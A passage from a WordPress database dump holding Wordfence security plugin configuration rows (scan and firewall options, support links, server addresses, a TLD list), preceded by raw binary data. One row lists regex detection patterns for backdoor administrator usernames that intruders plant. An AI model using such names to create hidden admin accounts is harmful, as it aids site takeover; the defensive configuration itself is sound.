�4��_p?��3���x0�\Zr���6����%x8���ã�Nv���q�0�[������w�\n�}��#�y�&<��$�C����ɚ�0��?�`��=1c�[��/5�eW+̲�YS�zK=f�`Nb��o읆7�{���oM���?ǻ5���e��{���e%j,�B�Xd\\�����\n|��ş��I?G,�\\�eϻ㳄h|��	��\r�\n�`��5+k�cո]�ҿ_V��X]�\rk<W`��I���o�b]��5��?N��3���������n`Ky~Vٌ��\r���FI�~d�w~H������3\0�t$�{ȓ�I�4�?��n.��}�r�\\E=�3Ii�g�5˔z��B}�:H9/�T��P��i@�Ѥ�M�Ҡq�i�r�\\[B�����5�\"i]J!��H{Y霉�a]7а�wIo�	�=n&��d��L�!/Ȱv>�\r�L����%�4�0M*J�)�\'iʢd�^J&�$���hځ{4�|+M7/����d���溚���dn�L�H\r&d9͐��m�E�}S9�,%��6�G���B��B��E���F9�ϥ�%\Z�ts-M;L˜��yw�ts�U����\\Z�@Վ�eyŇ��eZg�N>�䛹�|�O%?�0�����5���;�6X��Pږ@���}ӂh��ڇ(��?��K�|������Xc:��M��\'P��5�����2:��H�3/PTk�\\	tj�d��+��7�(n�1JP$JPk��E����l�(���Bg����>��J-��Ԇ:?���b�)�Q�5�S�1o�{A]�J���<(kv\"]u�@�^�� �6L�v~���B9���F�Gʝ|�r���[]����2���74P���T��Dz��Å:���*���J�]���OR�g_*\r2��s*�\ZHe��P��-���F��s���=U;���2�u�I�Gһ���L ���?fPÔ�(-����o�Rs�~����h�Km��Kj_��ګ��Ou�U����s@�\\ً�ʆ��p���];-X!��rSYq��?��Φr�=V�g��U��.���yɪ]G��SVmV�uXm~\'�e��A}����<�љ���АJ�Yp�u�M`��<�ڄ�eO`����`�56���#V��a�<�x	����#\r�����<�[��l��̖�x�<a�:O��\'�ڰ��d�<Ý\'���)�3٤L���^�3�&�i~ώW`��M<��[&�b+�,��p���{���^0��ZG��;5��t/_W�˃?�\r�RmŮ�&�_�ͫ��N]e��yu�-�qِ=��c����&Bx�e(�����ղ��&{\'�?��bʾ���O�oP��f.�@-\\~����9�]�wm��ݣ����Q����q�8~��C��8tq9�ީ��O{pؚt˨�6|�s&�ٕ�g#G�_��8ҹ�#��	c\r>�Q��S?sL�O>�x�O�[ñ�9V��Oo�����+�p�ݕ���I����N����My����(�s���y��|q���h��}�����Ô�8��&_��f��k-����|{�N��ѓ��w}��|�|�..(�̅;�\"�ü(~ؖΏۺ���\"��pu.7I��E\\�Ѝ+^�s��a~i;�����n���#f��g\\�Ńk5�s��N~S؅�;��n��;��m������>r��Hn�|�C�p��}�4@�?���ֿ����%�Mώ�Y~����^�g3�b�گQ�P���6]Q>Q\'�]���jQ�}!�eWd���5!Q�䄋v��h�g��}O\Z8Wt\"~�XO�)�ݎ2줱��*��4���$�?�C�_���Ā��(�E����H�<8(c*Aƙd�Dj�IˣdJ��Lm6��ފ�5��V�Q�buJSlU��6Ķ���־�w�]�T���)�[�dA�HYx�U��8�*�%�ʲԌeiL�8���ӫ4Y5t���T#�;�WI������ɺ��)	_+KY?{���W��4L��ٺ3M�(J��z�i�(;�%��X�\'�J�z�LҒ��v�И>rx���\rk��x+���.�W���Z9�D5����?�T�P��X-	+NH⑋�XV()k^KJ`����\'�c�%uF��S��i#$ӭH��I��sɪ�\"Y�%r���6\'A�\"$\'*Rr�%ש@�޺ɝ�R�?T$���R01J\n\'ΓBUy�V*u\n�q��<��E�wIqM���HI�gy:�J��<$�cʤ��@��I�~y���Tx{HŶ�RY U�w�e[����BjޚKM�Z�=~B���;���N�E�Mȓ�9(\r�{K�ۏ�О%�.��i��|2� -�����f�R�+��H�_i�>G�f͓�g�k{�|���ʷ�Q�1�]:��HG�\"�n��K��\ZS�� M�Ч$a���ͩ�fl�?�wZjȑ\0','no'),('manualScanType','onceDaily','yes'),('max404Crawlers','DISABLED','yes'),('max404Crawlers_action','throttle','yes'),('max404Humans','DISABLED','yes'),('max404Humans_action','throttle','yes'),('maxExecutionTime','0','yes'),('maxGlobalRequests','DISABLED','yes'),('maxGlobalRequests_action','throttle','yes'),('maxMem','256','yes'),('maxRequestsCrawlers','DISABLED','yes'),('maxRequestsCrawlers_action','throttle','yes'),('maxRequestsHumans','DISABLED','yes'),('maxRequestsHumans_action','throttle','yes'),('migration636_email_summary_excluded_directories','1','no'),('needsNewTour_blocking','1','yes'),('needsNewTour_dashboard','1','yes'),('needsNewTour_firewall','1','yes'),('needsNewTour_livetraffic','1','yes'),('needsNewTour_loginsecurity','1','yes'),('needsNewTour_scan','1','yes'),('needsUpgradeTour_blocking','0','yes'),('needsUpgradeTour_dashboard','0','yes'),('needsUpgradeTour_firewall','0','yes'),('needsUpgradeTour_livetraffic','0','yes'),('needsUpgradeTour_loginsecurity','0','yes'),('needsUpgradeTour_scan','0','yes'),('neverBlockBG','neverBlockVerified','yes'),('noc1ScanSchedule','a:2:{i:0;i:1629892200;i:1;i:1630151400;}','yes'),('notification_blogHighlights','1','yes'),('notification_productUpdates','1','yes'),('notification_promotions','1','yes'),('notification_scanStatus','1','yes'),('notification_securityAlerts','1','yes'),('notification_updatesNeeded','1','yes'),('onboardingAttempt1','skipped','yes'),('onboardingAttempt2','','no'),('onboardingAttempt3','','no'),('onboardingAttempt3Initial','0','yes'),('originalScheduledScanStart','1629633000','yes'),('other_blockBadPOST','0','yes'),('other_bypassLitespeedNoabort','0','yes'),('other_hideWPVersion','0','yes'),('other_pwStrengthOnUpdate','1','yes'),('other_scanComments','1','yes'),('other_scanOutside','0','yes'),('other_WFNet','1','yes'),('previousWflogsFileList','[\".htaccess\",\"config.php\",\"config-livewaf.php\",\"rules.php\",\"template.php\",\"config-synced.php\",\"GeoLite2-Country.mmdb\",\"ips.php\",\"attack-data.php\",\"config-transient.php\"]','yes'),('scanFileProcessing','','yes'),('scansEnabled_checkGSB','1','yes'),('scansEnabled_checkHowGetIPs','1','yes'),('scansEnabled_checkReadableConfig','1','yes'),('scansEnabled_comments','1','yes'),('scansEnabled_core','1','yes'),('scansEnabled_coreUnknown','1','yes'),('scansEnabled_diskSpace','1','yes'),('scansEnabled_fileContents','1','yes'),('scansEnabled_fileContentsGSB','1','yes'),('scansEnabled_geoipSupport','1','yes'),('scansEnabled_highSense','0','yes'),('scansEnabled_malware','1','yes'),('scansEnabled_oldVersions','1','yes'),('scansEnabled_options','1','yes'),('scansEnabled_passwds','1','yes'),('scansEnabled_plugins','0','yes'),('scansEnabled_posts','1','yes'),('scansEnabled_scanImages','0','yes'),('scansEnabled_suspectedFiles','1','yes'),('scansEnabled_suspiciousAdminUsers','1','yes'),('scansEnabled_suspiciousOptions','1','yes'),('scansEnabled_themes','0','yes'),('scansEnabled_wafStatus','1','yes'),('scansEnabled_wpscan_directoryListingEnabled','1','yes'),('scansEnabled_wpscan_fullPathDisclosure','1','yes'),('scanStageStatuses','a:11:{s:13:\"spamvertising\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:4:\"spam\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:9:\"blacklist\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:6:\"server\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:5;s:8:\"finished\";i:5;s:8:\"expected\";i:5;}s:7:\"changes\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:6:\"public\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"malware\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"content\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:3;s:8:\"finished\";i:3;s:8:\"expected\";i:3;}s:8:\"password\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:13:\"vulnerability\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:7:\"options\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}}','no'),('scanTime','1629801262.811','yes'),('scanType','standard','yes'),('scan_exclude','','yes'),('scan_include_extra','','yes'),('scan_maxDuration','','yes'),('scan_maxIssues','1000','yes'),('schedMode','auto','yes'),('schedStartHour','1','yes'),('scheduledScansEnabled','1','yes'),('serverDNS','1629821239;300;51.195.195.160','yes'),('serverIP','1629114849;51.77.116.174','yes'),('showAdminBarMenu','1','yes'),('showWfCentralUI','1','yes'),('signatureUpdateTime','1629489598','yes'),('spamvertizeCheck','1','yes'),('ssl_verify','1','yes'),('startScansRemotely','0','yes'),('supportContent','{\"top\":[{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":0},{\"title\":\"Optimizing The Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":1},{\"title\":\"Wordfence Web Application Firewall (WAF)\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"order\":2},{\"title\":\"Scan Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3},{\"title\":\"Wordfence and LiteSpeed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/litespeed\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Firewall Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":6},{\"title\":\"Scan Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":7},{\"title\":\"I am locked out of my site\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/#i-am-locked-out-of-my-site\",\"order\":8},{\"title\":\"PHP Fatal error: Failed opening required wordfence-waf.php\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php\",\"order\":9}],\"all\":[{\"title\":\"Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/\",\"excerpt\":\"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.\",\"children\":[{\"title\":\"Connecting your sites to Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/\",\"order\":0},{\"title\":\"Setting up two-factor authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/\",\"order\":1},{\"title\":\"Using the Dashboard page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/\",\"order\":2},{\"title\":\"Using the Configuration page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/\",\"order\":3},{\"title\":\"Using Wordfence plugin options Templates\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/\",\"order\":4},{\"title\":\"Using the Settings page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/\",\"order\":5},{\"title\":\"Using Wordfence Central Teams\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/teams\\/\",\"order\":6},{\"title\":\"Viewing scan Findings\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/\",\"order\":7}],\"order\":0},{\"title\":\"Dashboard\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/\",\"excerpt\":\"The Wordfence Dashboard provides insight into the current state of your site’s security.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/\",\"order\":0},{\"title\":\"Alerts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/\",\"order\":1}],\"order\":1},{\"title\":\"Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"excerpt\":\"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. \",\"children\":[{\"title\":\"Optimizing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":0},{\"title\":\"Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":1},{\"title\":\"Statistics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/\",\"order\":2},{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/\",\"order\":3},{\"title\":\"MySQLi storage engine\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/\",\"order\":4},{\"title\":\"Brute Force Protection\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/\",\"order\":5},{\"title\":\"Rate Limiting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/\",\"order\":7}],\"order\":2},{\"title\":\"Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/\",\"excerpt\":\"Aside from the Firewall rules that protect against SQL-injection, XSS and more, Wordfence also has custom features for additional blocking. \",\"children\":[{\"title\":\"Country Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/\",\"order\":0},{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":1}],\"order\":3},{\"title\":\"Scan\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/\",\"excerpt\":\"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, shells that hackers have installed, known malicious URLs and known patterns of infections.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/\",\"order\":0},{\"title\":\"Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":1},{\"title\":\"Scheduling\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/\",\"order\":2},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3}],\"order\":4},{\"title\":\"Tools\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/\",\"excerpt\":\"Wordfence Tools include Two Factor Authentication, Whois Lookup, Password Audit, Live Traffic and Diagnostics.\",\"children\":[{\"title\":\"Import\\/Export\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/\",\"order\":0},{\"title\":\"Password Auditing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/password-auditing\\/\",\"order\":1},{\"title\":\"Whois Lookup\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/\",\"order\":2},{\"title\":\"Diagnostics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/\",\"order\":3},{\"title\":\"Live Traffic\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Legacy Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/\",\"order\":6}],\"order\":5},{\"title\":\"Login Security\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/\",\"excerpt\":\"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.\",\"order\":6},{\"title\":\"Advanced\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/\",\"excerpt\":\"If you want to know more about the technical details of Wordfence, you\'ll find the answers in this section.\",\"children\":[{\"title\":\"System requirements\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/\",\"order\":0},{\"title\":\"Changelog\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/\",\"order\":1},{\"title\":\"Remove or Reset\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/\",\"order\":2},{\"title\":\"Technical Details\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/\",\"order\":3},{\"title\":\"Constants\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/\",\"order\":4},{\"title\":\"Wordfence API\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/\",\"order\":5},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/\",\"order\":6},{\"title\":\"Plugin \\/ Theme Conflicts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/plugin-theme-conflicts\\/\",\"order\":7}],\"order\":7},{\"title\":\"Wordfence Premium\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/\",\"excerpt\":\"Wordfence Premium comes with an IP Blocklist, Real Time Protection and much more.\",\"children\":[{\"title\":\"Account\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/account\\/\",\"order\":0},{\"title\":\"Pricing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/pricing\\/\",\"order\":1},{\"title\":\"License Key\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/api-key\\/\",\"order\":2}],\"order\":8},{\"title\":\"Wordfence and GDPR - General Data Protection Regulation\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/\",\"excerpt\":\"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available a data processing agreement to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services. We also provide a data processing agreement if you qualify as a data controller under the GDPR.\",\"children\":[{\"title\":\"Sub-Processors List\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/sub-processors-list\\/\",\"order\":0}],\"order\":9},{\"title\":\"Site Cleaning and Security Audits\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/security-services\\/\",\"excerpt\":\"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.\",\"order\":10},{\"title\":\"Login Security Plugin\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/\",\"excerpt\":\"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either can’t or don’t want to run the full Wordfence plugin.\",\"order\":11}]}','yes'),('supportHash','861fa35ee92ea792bee38ef73e0d7326fc59d39ea2f0acfe3a0b998811dfbf3c','yes'),('suspiciousAdminUsernames','a:2:{i:0;s:46:\"/^wp\\.service\\.controller(?:\\.[a-zA-Z0-9]+)$/i\";i:1;s:55:\"/^(?:wordpressssadmin|wordprestadmin|jaime.besser56)$/i\";}','yes'),('timeoffset_wf','0','yes'),('timeoffset_wf_updated','1629801256','yes'),('tldlist','|com|org|net|edu|aaa|abb|abc|aco|ads|aeg|afl|aig|anz|aol|app|art|aws|axa|bar|bbc|bbt|bcg|bcn|bet|bid|bio|biz|bms|bmw|bom|boo|bot|box|buy|bzh|cab|cal|cam|car|cat|cba|cbn|cbs|ceo|cfa|cfd|cpa|crs|csc|dad|day|dds|dev|dhl|diy|dnp|dog|dot|dtv|dvr|eat|eco|esq|eus|fan|fit|fly|foo|fox|frl|ftr|fun|fyi|gal|gap|gay|gdn|gea|gle|gmo|gmx|goo|gop|got|gov|hbo|hiv|hkt|hot|how|ibm|ice|icu|ifm|inc|ing|ink|int|ist|itv|jcb|jio|jll|jmp|jnj|jot|joy|kfh|kia|kim|kpn|krd|lat|law|lds|llc|llp|lol|lpl|ltd|man|map|mba|med|men|mil|mit|mlb|mls|mma|moe|moi|mom|mov|msd|mtn|mtr|nab|nba|nec|new|nfl|ngo|nhk|now|nra|nrw|ntt|nyc|obi|off|one|ong|onl|ooo|ott|ovh|pay|pet|phd|pid|pin|pnc|pro|pru|pub|pwc|qvc|red|ren|ril|rio|rip|run|rwe|sap|sas|sbi|sbs|sca|scb|ses|sew|sex|sfr|ski|sky|soy|spa|srl|stc|tab|tax|tci|tdk|tel|thd|tjx|top|trv|tui|tvs|ubs|uno|uol|ups|vet|vig|vin|vip|wed|win|wme|wow|wtc|wtf|xin|xxx|xyz|you|yun|zip|ac|ad|ae|af|ag|ai|al|am|ao|aq|ar|as|at|au|aw|ax|az|ba|bb|bd|be|bf|bg|bh|bi|bj|bm|bn|bo|br|bs|bt|bv|bw|by|bz|ca|cc|cd|cf|cg|ch|ci|ck|cl|cm|cn|co|cr|cu|cv|cw|cx|cy|cz|de|dj|dk|dm|do|dz|ec|ee|eg|er|es|et|eu|fi|fj|fk|fm|fo|fr|ga|gb|gd|ge|gf|gg|gh|gi|gl|gm|gn|gp|gq|gr|gs|gt|gu|gw|gy|hk|hm|hn|hr|ht|hu|id|ie|il|im|in|io|iq|ir|is|it|je|jm|jo|jp|ke|kg|kh|ki|km|kn|kp|kr|kw|ky|kz|la|lb|lc|li|lk|lr|ls|lt|lu|lv|ly|ma|mc|md|me|mg|mh|mk|ml|mm|mn|mo|mp|mq|mr|ms|mt|mu|mv|mw|mx|my|mz|na|nc|ne|nf|ng|ni|nl|no|np|nr|nu|nz|om|pa|pe|pf|pg|ph|pk|pl|pm|pn|pr|ps|pt|pw|py|qa|re|ro|rs|ru|rw|sa|sb|sc|sd|se|sg|sh|si|sj|sk|sl|sm|sn|so|sr|ss|st|su|sv|sx|sy|sz|tc|td|tf|tg|th|tj|tk|tl|tm|tn|to|tr|tt|tv|tw|tz|ua|ug|uk|us|uy|uz|va|vc|ve|vg|vi|vn|vu|wf|ws|ye|yt|za|zm|zw|aarp|able|adac|aero|akdn|ally|amex|arab|arpa|alstom|army|arte|asda|asia|audi|auto|baby|band|bank|bbva|beer|best|bike|bing|blog|blue|bofa|bond|aetna|book|buzz|cafe|call|camp|cars|casa|case|cash|actor|care|adult|cbre|cern|chat|citi|city|club|cool|cymru|alsace|cyou|cards|coop|data|date|dclk|link|live|loan|loft|mini|mint|amfam|chase|cisco|mobi|apple|limo|amica|like|archi|cheap|citic|click|life|codes|crown|deal|dell|game|lidl|love|cloud|coach|ltda|luxe|maif|meme|media|meet|menu|miami|moda|news|next|lotte|lotto|moto|name|navy|boats|nexus|alfaromeo|nico|nike|open|nikon|ninja|page|deals|nokia|ollo|alibaba|pars|bosch|airbus|nowtv|pccw|pink|play|plus|beats|bible|bingo|delta|airtel|baidu|black|lilly|linde|movie|ping|lipsy|money|pics|lixil|loans|locus|pohl|alipay|prod|prof|qpon|raid|read|dabur|dance|pizza|porn|post|phone|photo|place|poker|praxi|press|prime|promo|shia|audio|autos|azure|build|osaka|paris|parts|party|quest|radio|allstate|omega|allfinanz|canon|mango|vana|shoes|shop|show|silk|sina|site|skin|sncf|sohu|song|sony|skype|sling|smart|smile|solar|space|spot|star|sport|stada|store|study|style|surf|talk|sucks|swiss|tatar|taxi|team|teva|tiaa|tips|tires|tirol|tmall|today|tokyo|tools|abarth|abbott|tech|toray|video|abbvie|agency|total|tours|town|toys|trade|vegas|africa|trust|tube|tunes|tushu|ubank|amazon|duck|audible|avianca|brother|dvag|broker|academy|camera|coffee|auspost|channel|dish|author|clinic|docs|earth|anquan|aramco|career|casino|center|chanel|email|boston|edeka|chrome|church|circle|claims|banamex|abudhabi|auction|bananarepublic|comsec|bugatti|accountants|condos|fage|careers|desi|caravan|diet|capital|erni|coupon|dubai|epson|cruise|dunlop|dupont|durban|emerck|expert|accenture|associates|estate|events|attorney|credit|athleta|energy|accountant|dentist|fail|fans|fiat|beauty|fast|fish|florist|food|ferrero|fire|flir|dental|farm|fido|film|ford|frogans|fujitsu|ggee|final|finance|free|fund|gbiz|gent|gift|bayern|bentley|flowers|gmbh|ferrari|gallery|gallo|games|goog|bestbuy|guge|bharti|faith|gold|golf|guru|hair|gifts|futbol|haus|berlin|family|farmers|fashion|hdfc|fedex|design|help|here|hgtv|gives|horse|barclays|forex|green|gripe|barclaycard|gmail|barcelona|gucci|flickr|flights|globo|group|guide|host|honda|hsbc|bostik|drive|glade|glass|homes|hyatt|icbc|forum|booking|immo|yoga|house|ieee|ikano|imdb|lgbt|work|abogado|works|world|doctor|xerox|basketball|zara|zero|bauhaus|dating|datsun|dealer|degree|yahoo|direct|fishing|xbox|fitness|bargains|baseball|education|zone|barefoot|forsale|gallup|kiwi|contact|kddi|land|visa|koeln|google|jprs|kaufen|kinder|kindle|kosher|kpmg|kred|lego|luxury|madrid|maison|makeup|market|mattel|monash|stream|studio|supply|suzuki|swatch|sydney|taipei|grocery|unicom|android|tattoo|compare|target|company|taobao|viva|vivo|gratis|lexus|volvo|garden|global|legal|voto|lease|vote|george|giving|kyoto|corsica|juegos|lamer|lefrak|london|vodka|shouji|coupons|viajes|viking|villas|vision|voting|voyage|country|courses|lancia|latino|lawyer|living|locker|mobile|soccer|social|tennis|virgin|wine|zappos|agakhan|charity|college|cologne|comcast|airforce|chintai|citadel|clubmed|cooking|cruises|digital|domains|exposed|express|genting|godaddy|americanexpress|americanfamily|cricket|guitars|hermes|itau|hiphop|hitachi|irish|watch|weber|hockey|holiday|hotels|hughes|info|jaguar|java|nissan|nissay|oracle|pfizer|photos|physio|pictet|webcam|weibo|hamburg|hosting|afamilycompany|intuit|wiki|health|wien|imamat|insure|mormon|weir|hangout|norton|nowruz|office|olayan|online|orange|otsuka|toyota|travel|hoteles|jeep|jetzt|monster|amsterdam|juniper|lanxess|lasalle|latrobe|analytics|hyundai|jobs|leclerc|limited|lincoln|apartments|joburg|moscow|wales|museum|racing|tienda|xihuan|yandex|hotmail|ismaili|aquarelle|quebec|wang|nagoya|jewelry|natura|kitchen|mutual|markets|netflix|network|oldnavy|philips|tjmaxx|komatsu|okinawa|politie|tkmaxx|yachts|netbank|pioneer|walter|lacaixa|organic|origins|vuelos|neustar|realtor|shell|boutique|bradesco|broadway|budapest|builders|business|capetown|catering|walmart|catholic|christmas|cipriani|computer|capitalone|shiksha|wanggou|cityeats|cleaning|clinique|clothing|commbank|democrat|diamonds|discount|community|discover|download|engineer|calvinklein|directory|engineering|enterprises|ericsson|equipment|construction|delivery|deloitte|consulting|creditcard|cuisinella|contractors|creditunion|cookingchannel|theatre|tickets|toshiba|trading|watches|cancerresearch|tiffany|weather|brussels|windows|winners|xfinity|yamaxun|youtube|zuerich|etisalat|whoswho|exchange|wedding|feedback|frontier|goodyear|website|fidelity|firmdale|grainger|graphics|guardian|firestone|football|frontdoor|furniture|hdfcbank|goldpoint|foundation|fresenius|foodnetwork|helsinki|eurovision|extraspace|fairwinds|healthcare|holdings|financial|ipiranga|homedepot|homegoods|homesense|hospital|insurance|immobilien|industries|infiniti|hisamitsu|institute|investments|international|istanbul|macys|rmit|bnpparibas|rent|bloomberg|reise|reit|rest|rich|room|rsvp|rehab|ruhr|safe|ricoh|sale|rocks|rodeo|rugby|blackfriday|blockbuster|reisen|salon|sarl|save|saxo|boehringer|repair|jpmorgan|kerryhotels|kerrylogistics|realty|report|review|rogers|school|recipes|safety|sakura|rentals|sener|rocher|reviews|rexroth|ryukyu|seven|samsung|sexy|sharp|shaw|select|singles|staples|storage|support|surgery|saarland|temasek|samsclub|sandvik|sanofi|schmidt|systems|schaeffler|schule|realestate|schwarz|science|services|shopping|showtime|softbank|software|scjohnson|sandvikcoromant|scot|search|seat|secure|security|seek|shangrila|solutions|stcgroup|statebank|statefarm|stockholm|scholarships|kerryproperties|theater|lighting|lundbeck|marriott|maserati|mckinsey|memorial|kuokgroup|marketing|marshalls|merckmsd|mortgage|observer|melbourne|partners|property|yokohama|lancaster|lifestyle|xn--90ae|landrover|pharmacy|pictures|plumbing|reliance|microsoft|passagens|supplies|xn--l1acc|nextdirect|panasonic|redstone|xn--90ais|xn--c1avg|xn--node|mitsubishi|olayangroup|photography|pramerica|xn--ngbrx|xn--nqv7f|yodobashi|management|properties|xn--d1alf|xn--qxam|republican|restaurant|tatamotors|xn--e1a4c|prudential|richardli|xn--fhbei|xn--p1acf|xn--tckwe|xn--vhquv|protection|xn--p1ai|xn--qxa6a|swiftcover|technology|training|ventures|vacations|vanguard|vlaanderen|woodside|bridgestone|productions|university|verisign|travelers|volkswagen|xn--fiq64b|xn--fiqs8